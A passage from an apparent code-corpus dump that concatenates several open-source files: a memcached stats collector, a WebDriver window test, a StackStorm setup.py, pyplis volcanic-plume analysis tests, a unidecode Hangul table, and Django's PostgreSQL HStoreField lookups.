        """Collect several memcached STAT groups over the open connection
        ``mc`` into ``stats``; "timings" histograms are reduced to a
        weighted-average value per stat key."""
        cmd_list = ["timings", "tap", "checkpoint", "memory", ""]
        #cmd_list = ["tap"]
        try:
            for cmd in cmd_list:
                node_stats = mc.stats(cmd)
                if node_stats:
                    if cmd == "timings":
                        # need to preprocess histogram data first
                        vals = sorted([self.seg(*kv) for kv in node_stats.items()])
                        dd = {}
                        totals = {}
                        longest = 0
                        for s in vals:
                            # Use the midpoint of each histogram bucket.
                            avg = (s[0][1] + s[0][2]) / 2
                            k = s[0][0]
                            l = dd.get(k, [])
                            l.append((avg, s[1]))
                            dd[k] = l
                            totals[k] = totals.get(k, 0) + s[1]
                        for k in sorted(dd):
                            # Count-weighted average across buckets.
                            ccount = 0
                            for lbl,v in dd[k]:
                                ccount += v * lbl
                            stats[k] = ccount / totals[k]
                    else:
                        for key, val in node_stats.items():
                            stats[key] = val
        except Exception, err:
            traceback.print_exc()

    def get_mc_stats(self, server, bucketlist, nodes):
        """For every (bucket, node) pair, open a memcached connection and
        store the collected stats in ``stats_buffer.node_stats``."""
        #print util.pretty_print(bucketlist)
        for bucket in bucketlist:
            bucket_name = bucket['name']
            stats_buffer.node_stats[bucket_name] = {}
            for node in nodes:
                (node_server, node_port) = util.hostport(node['hostname'])
                self.log.info(" node: %s %s" % (node_server, node['ports']['direct']))
                stats = {}
                mc = cb_bin_client.MemcachedClient(node_server, node['ports']['direct'])
                # Non-default buckets require SASL authentication.
                if bucket["name"] != "Default":
                    mc.sasl_auth_cram_md5(bucket_name.encode("utf8"), bucket["saslPassword"].encode("utf8"))
                self.get_mc_stats_per_node(mc, stats)
                stats_buffer.node_stats[bucket_name][node['hostname']] = stats

    def get_ns_stats(self, bucketlist, server, port, user, password, opts):
        """Retrieve per-bucket ns_server statistics at every scale/stat
        combination declared in ``stats_buffer.stats`` and store them in
        ``stats_buffer.buckets``.  Prints one dot per stat as progress."""
        for bucket in bucketlist:
            bucket_name = bucket['name']
            stats_buffer.buckets[bucket_name] = copy.deepcopy(stats_buffer.stats)
            cmd = 'bucket-node-stats'
            for scale, stat_set in stats_buffer.buckets[bucket_name].iteritems():
                for stat in stat_set.iterkeys():
                    sys.stderr.write('.')
                    self.log.debug("retrieve: %s" % stat)
                    c = buckets.BucketNodeStats(bucket_name, stat, scale)
                    json = c.runCmd('bucket-node-stats', server, port, user, password, opts)
                    stats_buffer.buckets[bucket_name][scale][stat] = json
            sys.stderr.write('\n')

    def collect_data(self,cluster, user, password, opts):
        """Top-level entry point: run every collection step against the
        cluster addressed by ``cluster`` ("host:port")."""
        server, port = util.hostport(cluster)

        #get node list info
        nodes = self.get_hostlist(server, port, user, password, opts)
        self.log.debug(util.pretty_print(stats_buffer.nodes))

        #get bucket list
        bucketlist = self.get_bucketlist(server, port, user, password, opts)
        self.log.debug(util.pretty_print(stats_buffer.bucket_info))

        #get stats from ep-engine
        self.get_mc_stats(server, bucketlist, nodes)
        self.log.debug(util.pretty_print(stats_buffer.node_stats))

        #get stats from ns-server
        self.get_ns_stats(bucketlist, server, port, user, password, opts)
        self.log.debug(util.pretty_print(stats_buffer.buckets))
| apache-2.0 |
zmike/servo | tests/wpt/web-platform-tests/old-tests/webdriver/windows/window_manipulation.py | 142 | 1556 | # -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
from selenium.common import exceptions
class WindowingTest(base_test.WebDriverBaseTest):
    """WebDriver conformance checks for window maximize, resize and move."""

    def test_maximize(self):
        #self.driver.get(self.webserver.where_is("windows/res/win1.html"))
        self.driver.maximize_window()

    def test_window_size_manipulation(self):
        #self.driver.get(self.webserver.where_is("windows/res/win1.html"))
        # Set the size, then read it back and verify the exact dimensions.
        self.driver.set_window_size(400, 400)
        window_size = self.driver.get_window_size()
        self.assertTrue("width" in window_size)
        self.assertTrue("height" in window_size)
        self.assertEquals({"width": 400, "height":400}, window_size)

        """
        todo: make that work
        see: https://w3c.github.io/webdriver/webdriver-spec.html#setwindowsize
        result = self.driver.set_window_size(100, 100)
        self.assertTrue("status" in result)
        self.assertEquals(result["status"], 500)
        """

    def test_window_position_manipulation(self):
        #self.driver.get(self.webserver.where_is("windows/res/win1.html"))
        # Move the window, then read the position back and verify it.
        self.driver.set_window_position(400, 400)
        window_position = self.driver.get_window_position()
        self.assertTrue("x" in window_position)
        self.assertTrue("y" in window_position)
        self.assertEquals({"x": 400, "y": 400}, window_position)
# Run the suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
| mpl-2.0 |
Plexxi/st2 | contrib/runners/orquesta_runner/setup.py | 3 | 4346 | # -*- coding: utf-8 -*-
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os.path
from setuptools import setup
from setuptools import find_packages
from dist_utils import fetch_requirements
from dist_utils import apply_vagrant_workaround
from orquesta_runner import __version__
# Directory containing this setup.py; lets requirements.txt be resolved
# regardless of the current working directory.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
REQUIREMENTS_FILE = os.path.join(BASE_DIR, "requirements.txt")
# Parse pinned requirements and dependency links from requirements.txt.
install_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)
# Apply the Vagrant-specific packaging workaround (see dist_utils).
apply_vagrant_workaround()
# Package metadata for the StackStorm Orquesta runner.
setup(
    name="stackstorm-runner-orquesta",
    version=__version__,
    description="Orquesta workflow runner for StackStorm event-driven automation platform",
    author="StackStorm",
    author_email="info@stackstorm.com",
    license="Apache License (2.0)",
    url="https://stackstorm.com/",
    install_requires=install_reqs,
    dependency_links=dep_links,
    test_suite="tests",
    zip_safe=False,
    include_package_data=True,
    packages=find_packages(exclude=["setuptools", "tests"]),
    # Ship the runner metadata file alongside the package.
    package_data={"orquesta_runner": ["runner.yaml"]},
    scripts=[],
    entry_points={
        # Registers the runner with st2common's runner loader.
        "st2common.runners.runner": [
            "orquesta = orquesta_runner.orquesta_runner",
        ],
        # YAQL/Jinja helper functions exposed to Orquesta workflow
        # expressions; most simply re-export st2common helpers.
        "orquesta.expressions.functions": [
            "st2kv = orquesta_functions.st2kv:st2kv_",
            "task = orquesta_functions.runtime:task",
            "basename = st2common.expressions.functions.path:basename",
            "dirname = st2common.expressions.functions.path:dirname",
            "from_json_string = st2common.expressions.functions.data:from_json_string",
            "from_yaml_string = st2common.expressions.functions.data:from_yaml_string",
            "json_dump = st2common.expressions.functions.data:to_json_string",
            "json_parse = st2common.expressions.functions.data:from_json_string",
            "json_escape = st2common.expressions.functions.data:json_escape",
            "jsonpath_query = st2common.expressions.functions.data:jsonpath_query",
            "regex_match = st2common.expressions.functions.regex:regex_match",
            "regex_replace = st2common.expressions.functions.regex:regex_replace",
            "regex_search = st2common.expressions.functions.regex:regex_search",
            "regex_substring = st2common.expressions.functions.regex:regex_substring",
            (
                "to_human_time_from_seconds = "
                "st2common.expressions.functions.time:to_human_time_from_seconds"
            ),
            "to_json_string = st2common.expressions.functions.data:to_json_string",
            "to_yaml_string = st2common.expressions.functions.data:to_yaml_string",
            "use_none = st2common.expressions.functions.data:use_none",
            "version_compare = st2common.expressions.functions.version:version_compare",
            "version_more_than = st2common.expressions.functions.version:version_more_than",
            "version_less_than = st2common.expressions.functions.version:version_less_than",
            "version_equal = st2common.expressions.functions.version:version_equal",
            "version_match = st2common.expressions.functions.version:version_match",
            "version_bump_major = st2common.expressions.functions.version:version_bump_major",
            "version_bump_minor = st2common.expressions.functions.version:version_bump_minor",
            "version_bump_patch = st2common.expressions.functions.version:version_bump_patch",
            "version_strip_patch = st2common.expressions.functions.version:version_strip_patch",
            "yaml_dump = st2common.expressions.functions.data:to_yaml_string",
            "yaml_parse = st2common.expressions.functions.data:from_yaml_string",
        ],
    },
)
| apache-2.0 |
jgliss/pyplis | pyplis/test/test_highlevel_examples.py | 1 | 12011 | # -*- coding: utf-8 -*-
"""Pyplis high level test module.
This module contains some highlevel tests with the purpose to ensure
basic functionality of the most important features for emission-rate
analyses.
Note
----
The module is based on the dataset "testdata_minimal" which can be found
in the GitHub repo in the folder "pyplis/data/". The dataset is based on
the official Pyplis testdata set which is used for the example scripts.
This minimal version does not contain all images and the images are reduced
in size (Gauss-pyramid level 4).
Author: Jonas Gliss
Email: jonasgliss@gmail.com
License: GPLv3+
"""
from __future__ import (absolute_import, division)
import pyplis
from os.path import join
from datetime import datetime
import numpy.testing as npt
import pytest
# Paths into the minimal test dataset shipped with pyplis.
BASE_DIR = join(pyplis.__dir__, "data", "testdata_minimal")
IMG_DIR = join(BASE_DIR, "images")
# Acquisition time window of the plume images used for the analysis tests.
START_PLUME = datetime(2015, 9, 16, 7, 10, 00)
STOP_PLUME = datetime(2015, 9, 16, 7, 20, 00)
# Acquisition time window of the cell calibration images.
START_CALIB = datetime(2015, 9, 16, 6, 59, 00)
STOP_CALIB = datetime(2015, 9, 16, 7, 3, 00)
# Calibration cells: [column density, uncertainty] per cell id —
# presumably SO2 CDs in molecules cm^-2; TODO confirm units.
CALIB_CELLS = {'a37': [8.59e17, 2.00e17],
               'a53': [4.15e17, 1.00e17],
               'a57': [19.24e17, 3.00e17]}
# Two consecutive on-band plume images (used e.g. for optical flow).
PLUME_FILE = join(IMG_DIR,
                  'EC2_1106307_1R02_2015091607110434_F01_Etna.fts')
PLUME_FILE_NEXT = join(IMG_DIR,
                       'EC2_1106307_1R02_2015091607113241_F01_Etna.fts')
# Plume-free background images (on-band F01 and off-band F02).
BG_FILE_ON = join(IMG_DIR, 'EC2_1106307_1R02_2015091607022602_F01_Etna.fts')
BG_FILE_OFF = join(IMG_DIR, 'EC2_1106307_1R02_2015091607022216_F02_Etna.fts')
# Custom image import function for ECII FITS files.
FUN = pyplis.custom_image_import.load_ecII_fits
@pytest.fixture(scope="function")
def plume_img():
    """First on-band plume image, scaled up one Gauss pyramid level."""
    return pyplis.Img(PLUME_FILE, FUN).pyr_up(1)
@pytest.fixture(scope="function")
def plume_img_next():
    """Consecutive on-band plume image (for optical flow tests)."""
    return pyplis.Img(PLUME_FILE_NEXT, FUN).pyr_up(1)
@pytest.fixture(scope="function")
def bg_img_on():
    """On-band background image at pyramid level 0."""
    return pyplis.Img(BG_FILE_ON, FUN).to_pyrlevel(0)
@pytest.fixture(scope="function")
def bg_img_off():
    """Off-band background image at pyramid level 0."""
    return pyplis.Img(BG_FILE_OFF, FUN).to_pyrlevel(0)
def _make_setup():
    """Build the MeasSetup (camera, source, wind) used by all fixtures."""
    cam_id = "ecII"
    # Define camera (here the default ecII type is used)
    img_dir = IMG_DIR
    # Load default information for Etna
    source = pyplis.Source("etna")
    # Provide wind direction
    wind_info = {"dir": 0.0,
                 "dir_err": 1.0}
    # camera location and viewing direction (altitude will be retrieved
    # automatically)
    geom_cam = {"lon" : 15.1129, # noqa: E241 E203
                "lat" : 37.73122, # noqa: E241 E203
                'altitude' : 800, # noqa: E241 E203
                "elev" : 20.0, # noqa: E241 E203
                "elev_err" : 5.0, # noqa: E241 E203
                "azim" : 270.0, # noqa: E241 E203
                "azim_err" : 10.0, # noqa: E241 E203
                "alt_offset" : 15.0, # noqa: E241 E203
                "focal_length" : 25e-3} # noqa: E241 E203
    # the camera filter setup
    filters = [pyplis.Filter(type="on", acronym="F01"),
               pyplis.Filter(type="off", acronym="F02")]
    cam = pyplis.Camera(cam_id, filter_list=filters, **geom_cam)
    return pyplis.MeasSetup(img_dir,
                            camera=cam,
                            source=source,
                            wind_info=wind_info,
                            cell_info_dict=CALIB_CELLS,
                            auto_topo_access=False)
@pytest.fixture(scope="function")
def setup():
    """Fresh MeasSetup instance for each test."""
    return _make_setup()
@pytest.fixture(scope="function")
def calib_dataset(setup):
    """Initialize calibration dataset."""
    setup.start = START_CALIB
    setup.stop = STOP_CALIB
    return pyplis.CellCalibEngine(setup)
@pytest.fixture(scope="function")
def plume_dataset(setup):
    """Initialize measurement setup and create dataset from that."""
    setup.start = START_PLUME
    setup.stop = STOP_PLUME
    # Create analysis object (from BaseSetup)
    # The dataset takes care of finding all valid images in the time window.
    return pyplis.Dataset(setup)
@pytest.fixture(scope="function")
def aa_image_list(plume_dataset, bg_img_on, bg_img_off, viewing_direction):
    """Prepare AA image list for further analysis.

    Activates dark correction on both filter lists, attaches dark-corrected
    background images, configures the plume background model and switches
    the on-band list into apparent-absorbance (AA) mode.
    """
    # Get on and off lists and activate dark correction
    lst = plume_dataset.get_list("on")
    lst.activate_darkcorr() # same as lst.darkcorr_mode = 1
    off_list = plume_dataset.get_list("off")
    off_list.activate_darkcorr()
    # Prepare on and offband background images
    bg_img_on.subtract_dark_image(lst.get_dark_image().to_pyrlevel(0))
    bg_img_off.subtract_dark_image(off_list.get_dark_image().to_pyrlevel(0))
    # set the background images within the lists
    lst.set_bg_img(bg_img_on)
    off_list.set_bg_img(bg_img_off)
    # automatically set gas free areas
    # NOTE: this corresponds to pyramid level 3 as the test data is
    # stored in low res
    lst.bg_model.set_missing_ref_areas(lst.this)
    # Now update some of the information from the automatically set sky ref
    # areas
    lst.bg_model.xgrad_line_startcol = 1
    lst.bg_model.xgrad_line_rownum = 2
    # Keep both background models in sync before switching modes.
    off_list.bg_model.update(**lst.bg_model.settings_dict())
    lst.bg_model.mode = 0
    off_list.bg_model.mode = 0
    lst.calc_sky_background_mask()
    lst.aa_mode = True # activate AA mode
    # =============================================================================
    #
    # m = lst.bg_model
    # ax = lst.show_current()
    # ax.set_title("MODE: %d" %m.mode)
    # m.plot_tau_result()
    #
    # =============================================================================
    # =============================================================================
    # for mode in range(1,7):
    # lst.bg_model.CORR_MODE = mode
    # off_list.bg_model.CORR_MODE = mode
    # lst.load()
    # ax = lst.show_current()
    # ax.set_title("MODE: %d" %m.mode)
    # m.plot_tau_result()
    # =============================================================================
    lst.meas_geometry = viewing_direction
    return lst
@pytest.fixture(scope="function")
def line():
    """Create an example retrieval line."""
    return pyplis.LineOnImage(630, 780, 1000, 350, pyrlevel_def=0,
                              normal_orientation="left")
@pytest.fixture(scope="function")
def geometry(plume_dataset):
    """Measurement geometry taken from the plume dataset."""
    return plume_dataset.meas_geometry
@pytest.fixture(scope="function")
def viewing_direction(geometry):
    """Find viewing direction of camera based on MeasGeometry.

    Corrects azimuth and elevation in-place (``update=True``) using the
    known geographic position of Etna's SE crater and its pixel position
    in the image.
    """
    from geonum import GeoPoint
    # Position of SE crater in the image (x, y)
    se_crater_img_pos = [720, 570] # [806, 736] (changed on 12/5/19)
    # Geographic position of SE crater (extracted from Google Earth)
    # The GeoPoint object (geonum library) automatically retrieves the altitude
    # using SRTM data
    se_crater = GeoPoint(37.747757, 15.002643, altitude=3103.0)
    # The following method finds the camera viewing direction based on the
    # position of the south east crater.
    new_elev, new_azim, _, basemap =\
        geometry.find_viewing_direction(
            pix_x=se_crater_img_pos[0],
            pix_y=se_crater_img_pos[1],
            pix_pos_err=100, # for uncertainty estimate
            geo_point=se_crater,
            draw_result=False,
            update=True) # overwrite old settings
    return geometry
def test_setup(setup):
    """Test some properties of the MeasSetup object."""
    s = setup.source
    vals_exact = [setup.save_dir == setup.base_dir,
                  setup.camera.cam_id]
    # nominal values are regression references recorded from a known-good run
    vals_approx = [sum([sum(x) for x in setup.cell_info_dict.values()]),
                   s.lon + s.lat + s.altitude]
    nominal_exact = [True, "ecII"]
    nominal_approx = [3.798e18, 3381.750]
    npt.assert_array_equal(vals_exact, nominal_exact)
    npt.assert_allclose(vals_approx, nominal_approx, rtol=1e-4)
def test_dataset(plume_dataset):
    """Test certain properties of the dataset object."""
    ds = plume_dataset
    keys = list(ds.img_lists_with_data.keys())
    # total image count, image shape sum, list ids and camera id
    vals_exact = [ds.img_lists["on"].nof + ds.img_lists["off"].nof,
                  sum(ds.current_image("on").shape),
                  keys[0], keys[1], ds.cam_id]
    nominal_exact = [178, 2368, "on", "off", "ecII"]
    npt.assert_array_equal(vals_exact, nominal_exact)
def test_find_viewdir(viewing_direction):
    """Correct viewing direction using location of Etna SE crater."""
    # azimuth/elevation and their uncertainties after the SE-crater fit
    vals = [viewing_direction.cam_azim, viewing_direction.cam_azim_err,
            viewing_direction.cam_elev, viewing_direction.cam_elev_err]
    npt.assert_allclose(actual=vals,
                        desired=[280.21752138146036, 1.0656706289128692,
                                 13.72632050624192, 1.0656684171601736],
                        rtol=1e-7)
def test_imglists(plume_dataset):
    """Test some properties of the on and offband image lists."""
    # access the internal filter->list mapping directly (acronyms F01/F02)
    on = plume_dataset._lists_intern["F01"]["F01"]
    off = plume_dataset._lists_intern["F02"]["F02"]
    vals_exact = [on.list_id, off.list_id]
    nominal_exact = ["on", "off"]
    npt.assert_array_equal(vals_exact, nominal_exact)
def test_line(line):
    """Test some features from example retrieval line."""
    n1, n2 = line.normal_vector
    # convert the line to pyramid level 1 within a cropped ROI
    l1 = line.convert(1, [100, 100, 1200, 1024])
    # compute values to be tested
    vals = [line.length(), line.normal_theta, n1, n2,
            l1.length() / line.length(), sum(l1.roi_def)]
    # set nominal values
    nominal = [567, 310.710846671181, -0.7580108737829234, -0.6522419146504225,
               0.5008818342151675, 1212]
    npt.assert_allclose(vals, nominal, rtol=1e-7)
def test_geometry(geometry):
    """Test important results from geometrical calculations."""
    # mean pixel-to-plume distances / integration step lengths
    res = geometry.compute_all_integration_step_lengths()
    vals = [res[0].mean(), res[1].mean(), res[2].mean()]
    npt.assert_allclose(actual=vals,
                        desired=[2.0292366, 2.0292366, 10909.873],
                        rtol=1e-7)
def test_optflow(plume_img, plume_img_next, line):
    """Test optical flow calculation.

    Computes Farneback optical flow between two consecutive plume images
    and checks mean flow length/orientation plus the local flow statistics
    along the retrieval line against regression reference values.
    """
    flow = pyplis.OptflowFarneback()
    flow.set_images(plume_img, plume_img_next)
    flow.calc_flow()
    len_img = flow.get_flow_vector_length_img()
    angle_img = flow.get_flow_orientation_img()
    l = line.convert(plume_img.pyrlevel)
    res = flow.local_flow_params(line=l, dir_multi_gauss=False)
    # regression reference values from a known-good run
    nominal = [0.658797,
               -41.952854,
               -65.971787,
               22.437565,
               0.128414,
               0.086898,
               28.07,
               0.518644]
    vals = [len_img.mean(),
            angle_img.mean(), res["_dir_mu"],
            res["_dir_sigma"], res["_len_mu_norm"],
            res["_len_sigma_norm"], res["_del_t"],
            res["_significance"]]
    npt.assert_allclose(vals, nominal, rtol=1e-5)
    # NOTE(review): returning from a test is unusual; presumably kept for
    # interactive use — pytest ignores the return value.
    return flow
def test_auto_cellcalib(calib_dataset):
    """Test if automatic cell calibration works.

    Checks that six cell image lists (three per filter) are detected and
    that the summed mean intensities of cell and background lists match
    the regression reference values.
    """
    calib_dataset.find_and_assign_cells_all_filter_lists()
    keys = ["on", "off"]
    # [num cell lists, sum of cell means, sum of bg means, cells on, cells off]
    nominal = [6., 845.50291, 354.502678, 3., 3.]
    mean = 0
    bg_mean = calib_dataset.bg_lists["on"].this.mean() +\
        calib_dataset.bg_lists["off"].this.mean()
    num = 0
    for key in keys:
        for lst in calib_dataset.cell_lists[key].values():
            mean += lst.this.mean()
            num += 1
    vals = [num, mean, bg_mean, len(calib_dataset.cell_lists["on"]),
            len(calib_dataset.cell_lists["off"])]
    npt.assert_allclose(nominal, vals, rtol=1e-7)
def test_bg_model(plume_dataset):
    """Test properties of plume background modelling.
    Uses the PlumeBackgroundModel instance in the on-band image
    list of the test dataset object (see :func:`plume_dataset`)
    """
    # NOTE(review): no assertions — this only exercises
    # set_missing_ref_areas for exceptions.
    l = plume_dataset.get_list("on")
    m = l.bg_model
    m.set_missing_ref_areas(l.this)
    # m.set_missing_ref_areas(plume_img())
# Allow running this module as a plain script for interactive debugging.
if __name__ == "__main__":
    stp = _make_setup()
| gpl-3.0 |
lepricon49/headphones | lib/unidecode/x0ad.py | 253 | 4766 | data = (
'gwan', # 0x00
'gwanj', # 0x01
'gwanh', # 0x02
'gwad', # 0x03
'gwal', # 0x04
'gwalg', # 0x05
'gwalm', # 0x06
'gwalb', # 0x07
'gwals', # 0x08
'gwalt', # 0x09
'gwalp', # 0x0a
'gwalh', # 0x0b
'gwam', # 0x0c
'gwab', # 0x0d
'gwabs', # 0x0e
'gwas', # 0x0f
'gwass', # 0x10
'gwang', # 0x11
'gwaj', # 0x12
'gwac', # 0x13
'gwak', # 0x14
'gwat', # 0x15
'gwap', # 0x16
'gwah', # 0x17
'gwae', # 0x18
'gwaeg', # 0x19
'gwaegg', # 0x1a
'gwaegs', # 0x1b
'gwaen', # 0x1c
'gwaenj', # 0x1d
'gwaenh', # 0x1e
'gwaed', # 0x1f
'gwael', # 0x20
'gwaelg', # 0x21
'gwaelm', # 0x22
'gwaelb', # 0x23
'gwaels', # 0x24
'gwaelt', # 0x25
'gwaelp', # 0x26
'gwaelh', # 0x27
'gwaem', # 0x28
'gwaeb', # 0x29
'gwaebs', # 0x2a
'gwaes', # 0x2b
'gwaess', # 0x2c
'gwaeng', # 0x2d
'gwaej', # 0x2e
'gwaec', # 0x2f
'gwaek', # 0x30
'gwaet', # 0x31
'gwaep', # 0x32
'gwaeh', # 0x33
'goe', # 0x34
'goeg', # 0x35
'goegg', # 0x36
'goegs', # 0x37
'goen', # 0x38
'goenj', # 0x39
'goenh', # 0x3a
'goed', # 0x3b
'goel', # 0x3c
'goelg', # 0x3d
'goelm', # 0x3e
'goelb', # 0x3f
'goels', # 0x40
'goelt', # 0x41
'goelp', # 0x42
'goelh', # 0x43
'goem', # 0x44
'goeb', # 0x45
'goebs', # 0x46
'goes', # 0x47
'goess', # 0x48
'goeng', # 0x49
'goej', # 0x4a
'goec', # 0x4b
'goek', # 0x4c
'goet', # 0x4d
'goep', # 0x4e
'goeh', # 0x4f
'gyo', # 0x50
'gyog', # 0x51
'gyogg', # 0x52
'gyogs', # 0x53
'gyon', # 0x54
'gyonj', # 0x55
'gyonh', # 0x56
'gyod', # 0x57
'gyol', # 0x58
'gyolg', # 0x59
'gyolm', # 0x5a
'gyolb', # 0x5b
'gyols', # 0x5c
'gyolt', # 0x5d
'gyolp', # 0x5e
'gyolh', # 0x5f
'gyom', # 0x60
'gyob', # 0x61
'gyobs', # 0x62
'gyos', # 0x63
'gyoss', # 0x64
'gyong', # 0x65
'gyoj', # 0x66
'gyoc', # 0x67
'gyok', # 0x68
'gyot', # 0x69
'gyop', # 0x6a
'gyoh', # 0x6b
'gu', # 0x6c
'gug', # 0x6d
'gugg', # 0x6e
'gugs', # 0x6f
'gun', # 0x70
'gunj', # 0x71
'gunh', # 0x72
'gud', # 0x73
'gul', # 0x74
'gulg', # 0x75
'gulm', # 0x76
'gulb', # 0x77
'guls', # 0x78
'gult', # 0x79
'gulp', # 0x7a
'gulh', # 0x7b
'gum', # 0x7c
'gub', # 0x7d
'gubs', # 0x7e
'gus', # 0x7f
'guss', # 0x80
'gung', # 0x81
'guj', # 0x82
'guc', # 0x83
'guk', # 0x84
'gut', # 0x85
'gup', # 0x86
'guh', # 0x87
'gweo', # 0x88
'gweog', # 0x89
'gweogg', # 0x8a
'gweogs', # 0x8b
'gweon', # 0x8c
'gweonj', # 0x8d
'gweonh', # 0x8e
'gweod', # 0x8f
'gweol', # 0x90
'gweolg', # 0x91
'gweolm', # 0x92
'gweolb', # 0x93
'gweols', # 0x94
'gweolt', # 0x95
'gweolp', # 0x96
'gweolh', # 0x97
'gweom', # 0x98
'gweob', # 0x99
'gweobs', # 0x9a
'gweos', # 0x9b
'gweoss', # 0x9c
'gweong', # 0x9d
'gweoj', # 0x9e
'gweoc', # 0x9f
'gweok', # 0xa0
'gweot', # 0xa1
'gweop', # 0xa2
'gweoh', # 0xa3
'gwe', # 0xa4
'gweg', # 0xa5
'gwegg', # 0xa6
'gwegs', # 0xa7
'gwen', # 0xa8
'gwenj', # 0xa9
'gwenh', # 0xaa
'gwed', # 0xab
'gwel', # 0xac
'gwelg', # 0xad
'gwelm', # 0xae
'gwelb', # 0xaf
'gwels', # 0xb0
'gwelt', # 0xb1
'gwelp', # 0xb2
'gwelh', # 0xb3
'gwem', # 0xb4
'gweb', # 0xb5
'gwebs', # 0xb6
'gwes', # 0xb7
'gwess', # 0xb8
'gweng', # 0xb9
'gwej', # 0xba
'gwec', # 0xbb
'gwek', # 0xbc
'gwet', # 0xbd
'gwep', # 0xbe
'gweh', # 0xbf
'gwi', # 0xc0
'gwig', # 0xc1
'gwigg', # 0xc2
'gwigs', # 0xc3
'gwin', # 0xc4
'gwinj', # 0xc5
'gwinh', # 0xc6
'gwid', # 0xc7
'gwil', # 0xc8
'gwilg', # 0xc9
'gwilm', # 0xca
'gwilb', # 0xcb
'gwils', # 0xcc
'gwilt', # 0xcd
'gwilp', # 0xce
'gwilh', # 0xcf
'gwim', # 0xd0
'gwib', # 0xd1
'gwibs', # 0xd2
'gwis', # 0xd3
'gwiss', # 0xd4
'gwing', # 0xd5
'gwij', # 0xd6
'gwic', # 0xd7
'gwik', # 0xd8
'gwit', # 0xd9
'gwip', # 0xda
'gwih', # 0xdb
'gyu', # 0xdc
'gyug', # 0xdd
'gyugg', # 0xde
'gyugs', # 0xdf
'gyun', # 0xe0
'gyunj', # 0xe1
'gyunh', # 0xe2
'gyud', # 0xe3
'gyul', # 0xe4
'gyulg', # 0xe5
'gyulm', # 0xe6
'gyulb', # 0xe7
'gyuls', # 0xe8
'gyult', # 0xe9
'gyulp', # 0xea
'gyulh', # 0xeb
'gyum', # 0xec
'gyub', # 0xed
'gyubs', # 0xee
'gyus', # 0xef
'gyuss', # 0xf0
'gyung', # 0xf1
'gyuj', # 0xf2
'gyuc', # 0xf3
'gyuk', # 0xf4
'gyut', # 0xf5
'gyup', # 0xf6
'gyuh', # 0xf7
'geu', # 0xf8
'geug', # 0xf9
'geugg', # 0xfa
'geugs', # 0xfb
'geun', # 0xfc
'geunj', # 0xfd
'geunh', # 0xfe
'geud', # 0xff
)
| gpl-3.0 |
edevil/django | django/contrib/postgres/fields/hstore.py | 14 | 4495 | import json
from django.contrib.postgres import forms
from django.contrib.postgres.fields.array import ArrayField
from django.core import exceptions
from django.db.models import Field, Lookup, Transform, TextField
from django.utils import six
from django.utils.translation import ugettext_lazy as _
__all__ = ['HStoreField']
class HStoreField(Field):
    """Model field storing a PostgreSQL ``hstore`` map of strings to strings."""
    empty_strings_allowed = False
    description = _('Map of strings to strings')
    default_error_messages = {
        'not_a_string': _('The value of "%(key)s" is not a string.'),
    }
    def db_type(self, connection):
        # Column type emitted in generated DDL.
        return 'hstore'
    def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
        # ``contains`` compares against a whole hstore value, so the prepared
        # value is wrapped in a single-element parameter list.
        if lookup_type == 'contains':
            return [self.get_prep_value(value)]
        # NOTE(review): the incoming ``prepared`` flag is not forwarded
        # (``prepared=False`` is hard-coded here) — confirm intentional.
        return super(HStoreField, self).get_db_prep_lookup(lookup_type, value,
                                                           connection, prepared=False)
    def get_transform(self, name):
        # Fall back to hstore key access (``field__somekey``) when *name*
        # is not a registered transform.
        transform = super(HStoreField, self).get_transform(name)
        if transform:
            return transform
        return KeyTransformFactory(name)
    def validate(self, value, model_instance):
        """Reject any value in the mapping that is not a string."""
        super(HStoreField, self).validate(value, model_instance)
        for key, val in value.items():
            if not isinstance(val, six.string_types):
                raise exceptions.ValidationError(
                    self.error_messages['not_a_string'],
                    code='not_a_string',
                    params={'key': key},
                )
    def to_python(self, value):
        # Deserialization counterpart of value_to_string (JSON round-trip).
        if isinstance(value, six.string_types):
            value = json.loads(value)
        return value
    def value_to_string(self, obj):
        # Serialize the mapping as JSON for serializers/fixtures.
        value = self._get_val_from_obj(obj)
        return json.dumps(value)
    def formfield(self, **kwargs):
        # Default to the matching postgres form field; callers may override.
        defaults = {
            'form_class': forms.HStoreField,
        }
        defaults.update(kwargs)
        return super(HStoreField, self).formfield(**defaults)
@HStoreField.register_lookup
class HStoreContainsLookup(Lookup):
    """Implements the hstore ``@>`` (contains) operator."""
    lookup_name = 'contains'
    def as_sql(self, compiler, connection):
        left_sql, left_params = self.process_lhs(compiler, connection)
        right_sql, right_params = self.process_rhs(compiler, connection)
        sql = '%s @> %s' % (left_sql, right_sql)
        return sql, left_params + right_params
@HStoreField.register_lookup
class HStoreContainedByLookup(Lookup):
    """Implements the hstore ``<@`` (contained by) operator."""
    lookup_name = 'contained_by'
    def as_sql(self, compiler, connection):
        left_sql, left_params = self.process_lhs(compiler, connection)
        right_sql, right_params = self.process_rhs(compiler, connection)
        sql = '%s <@ %s' % (left_sql, right_sql)
        return sql, left_params + right_params
@HStoreField.register_lookup
class HasKeyLookup(Lookup):
    """Implements the hstore ``?`` (has key) operator."""
    lookup_name = 'has_key'
    def as_sql(self, compiler, connection):
        left_sql, left_params = self.process_lhs(compiler, connection)
        right_sql, right_params = self.process_rhs(compiler, connection)
        sql = '%s ? %s' % (left_sql, right_sql)
        return sql, left_params + right_params
@HStoreField.register_lookup
class HasKeysLookup(Lookup):
    """Implements the hstore ``?&`` (has all keys) operator."""
    lookup_name = 'has_keys'
    def as_sql(self, compiler, connection):
        left_sql, left_params = self.process_lhs(compiler, connection)
        right_sql, right_params = self.process_rhs(compiler, connection)
        sql = '%s ?& %s' % (left_sql, right_sql)
        return sql, left_params + right_params
class KeyTransform(Transform):
    """Transform yielding the value stored under a fixed hstore key."""
    output_field = TextField()
